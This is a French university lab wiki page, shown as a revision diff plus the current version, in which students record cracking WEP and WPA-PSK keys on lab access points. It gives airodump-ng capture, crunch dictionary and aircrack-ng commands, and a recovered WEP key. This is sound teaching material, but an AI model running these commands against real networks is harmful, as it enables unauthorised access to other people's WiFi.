« Atelier SysRes SE5 2023/2024 E3 » : différence entre les versions
Aller à la navigation
Aller à la recherche
Aucun résumé des modifications |
|||
Ligne 22 : | Ligne 22 : | ||
</syntaxhighlight> | </syntaxhighlight> | ||
[[Fichier:PR2.jpg| | [[Fichier:PR2.jpg|vignette|1369x1369px|centré]] | ||
Ligne 40 : | Ligne 36 : | ||
BSSID : 44:AD:D9:5F:87:09 | BSSID : 44:AD:D9:5F:87:09 | ||
Création d'un dictionnaire à l'aide de crunch<syntaxhighlight lang="bash"> | Création d'un dictionnaire à l'aide de crunch<syntaxhighlight lang="bash"> | ||
crunch 8 8 0123456789 dico.txt $Création du dico | crunch 8 8 0123456789 dico.txt $Création du dico | ||
Ligne 48 : | Ligne 42 : | ||
On créé un dictionnaire pour l'utiliser par la suite <syntaxhighlight lang="bash"> | On créé un dictionnaire pour l'utiliser par la suite <syntaxhighlight lang="bash"> | ||
airodump-ng --bssid 44:AD:D9:5F:87:09 -w output_10 wlan0mon $Récupération des paquets WiFi | airodump-ng --bssid 44:AD:D9:5F:87:09 -w output_10 wlan0mon $Récupération des paquets WiFi | ||
</syntaxhighlight>[[Fichier:Blou.jpg | </syntaxhighlight>[[Fichier:Blou.jpg|vignette|599x599px|centré]] | ||
On a besoin d'au moins 250 000 Data, on laisse donc tourner jusque là<syntaxhighlight lang="bash"> | |||
On a besoin d'au moins 250 000 Data, on laisse donc tourner jusque là | |||
<syntaxhighlight lang="bash"> | |||
aircrack-ng -b 40:A5:EF:05:9A:28 -w dico.txt output_10*.cap | aircrack-ng -b 40:A5:EF:05:9A:28 -w dico.txt output_10*.cap | ||
</syntaxhighlight> | </syntaxhighlight> | ||
[[Fichier:PR4.jpg | [[Fichier:PR4.jpg|vignette|612x612px|centré]] | ||
On teste avec un dictionnaire trop grand, on a donc pas le temps de terminer et de trouver la clé avant la fin de l'heure. | On teste avec un dictionnaire trop grand, on a donc pas le temps de terminer et de trouver la clé avant la fin de l'heure. |
Version du 17 janvier 2024 à 16:50
Groupe Elias et Mathis : (Baloo pour la machine mandataire)
Nous utilisons la cracotte4 et kracoote4
Cassage de clef WEP : "cracotte4"
On lance la commande :
airodump-ng -c 2 --bssid 04:DA:D2:9C:50:53 -w output wlan0mon
On laisse tourner jusqu'à obtenir 75 000 datas de manière à avoir plus de chance de trouver la clé lors du craquage.
On va lancer la commande pour le craquage :
aircrack-ng -b 04:DA:D2:9C:50:53 output*.cap
La clé a été trouvé très vite :
KEY FOUND! [ FF:FF:FF:FF:FA:BC:05:CB:AE:EE:EE:EE:EE ]
Cassage de clef WPA-PSK : "kracotte4"
WiFi : kracotte04
BSSID : 44:AD:D9:5F:87:09
Création d'un dictionnaire à l'aide de crunch
crunch 8 8 0123456789 dico.txt $Création du dico
On créé un dictionnaire pour l'utiliser par la suite
airodump-ng --bssid 44:AD:D9:5F:87:09 -w output_10 wlan0mon $Récupération des paquets WiFi
On a besoin d'au moins 250 000 Data, on laisse donc tourner jusque là
aircrack-ng -b 40:A5:EF:05:9A:28 -w dico.txt output_10*.cap
On teste avec un dictionnaire trop grand, on a donc pas le temps de terminer et de trouver la clé avant la fin de l'heure.